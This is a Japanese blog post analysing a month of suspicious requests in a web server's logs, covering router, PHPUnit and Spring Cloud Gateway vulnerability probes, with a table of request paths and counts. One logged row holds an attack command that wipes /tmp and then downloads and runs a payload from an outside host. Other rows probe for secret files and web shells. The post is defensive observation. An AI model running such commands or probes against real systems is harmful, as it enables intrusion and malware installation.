公開している web サーバのログから通常のアクセスではない通信について分析しました。
多かったリクエスト
先月に引き続き、ルーターなどのネットワーク機器とPHPの脆弱性に関する通信が多かったです。
ルータなどのネットワーク機器の調査
脆弱性が報告されているルーターなどで使われているログイン画面へアクセスする通信
JVNDB-2016-004125 - JVN iPedia - 脆弱性対策情報データベース
login.cgi
.envの調査
/.env
Netlink GPONルータ 脆弱性
ルータの脆弱性「CVE-2020-10173」を利用するIoTマルウェア | トレンドマイクロ セキュリティブログ
/boaform/admin/formLogin
PHPUnitのevalをリモート実行
PHPのユニットテストツールのPHPUnitの脆弱性を利用してのeval()を実行しようとする通信
/wp-content/themes/seotheme/db.php?u
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
Spring Frameworkの脆弱性
Spring FrameworkのSpring Cloud Gatewayという機能の脆弱性に関する通信みたいです。
CVE-2022-22947: Spring Cloud Gateway Code Injection Vulnerability
/actuator/gateway/routes
不審な通信の一覧
| uri | count |
|---|---|
| login.cgi | 804 |
| /.env | 315 |
| /boaform/admin/formLogin | 264 |
| * | 234 |
| /wp-content/themes/seotheme/db.php?u | 137 |
| /.git/config | 98 |
| /wp-login.php | 93 |
| /wp-content/plugins/ioptimization/IOptimize.php?rchk | 86 |
| /index.xml | 64 |
| mstshash=Administr | 57 |
| /app-ads.txt | 54 |
| /actuator/gateway/routes | 49 |
| mstshash=Domain | 44 |
| google.com:443 | 44 |
| /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 44 |
| /post/wp-login.php | 37 |
| /ab2g | 32 |
| www.shadowserver.org:443 | 30 |
| /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f | 30 |
| /actuator/health | 30 |
| /admin/console/ | 29 |
| /ab2h | 29 |
| /shell?cd+/tmp;rm+-rf+*;wget+heylitimysun.top/jaws;sh+/tmp/jaws | 26 |
| /autodiscover/autodiscover.json?@zdi/Powershell | 23 |
| /info.php | 22 |
| \xC0/\xC00\xC0+\xC0,\xCC\xA8\xCC\xA9\xC0\x13\xC0\x09\xC0\x14\xC0 | 21 |
| /tags/honeypot | 21 |
| /sitemap.xml | 21 |
| /_profiler/phpinfo | 21 |
| /manager/html | 20 |
| /tags/centos | 19 |
| /HNAP1/ | 18 |
| /wp-includes/wlwmanifest.xml | 17 |
| /test.php | 17 |
| /debug/default/view?panel=config | 17 |
| /aab8 | 17 |
| /xmlrpc.php?rsd | 16 |
| /wp1/wp-includes/wlwmanifest.xml | 16 |
| /wp/wp-includes/wlwmanifest.xml | 16 |
| /wordpress/wp-includes/wlwmanifest.xml | 16 |
| /web/wp-includes/wlwmanifest.xml | 16 |
| /test/wp-includes/wlwmanifest.xml | 16 |
| /tags/%E3%83%AD%E3%82%B0%E3%81%AE%E5%88%86%E6%9E%90 | 16 |
| /system_api.php | 16 |
| /streaming/clients_live.php | 16 |
| /stream/live.php | 16 |
| /stalker_portal/c/version.js | 16 |
| /site/wp-includes/wlwmanifest.xml | 16 |
| /flu/403.html | 16 |
| /cms/wp-includes/wlwmanifest.xml | 16 |
| /c/version.js | 16 |
| /blog/wp-includes/wlwmanifest.xml | 16 |
| /aaa9 | 16 |
| /.well-known/security.txt | 16 |
| /wso.php | 14 |
| /shell.php | 14 |
| /manager/text/list | 14 |
| /archives/2023 | 14 |
| /upload.php | 13 |
| /up.php | 13 |
| /shop/wp-includes/wlwmanifest.xml | 13 |
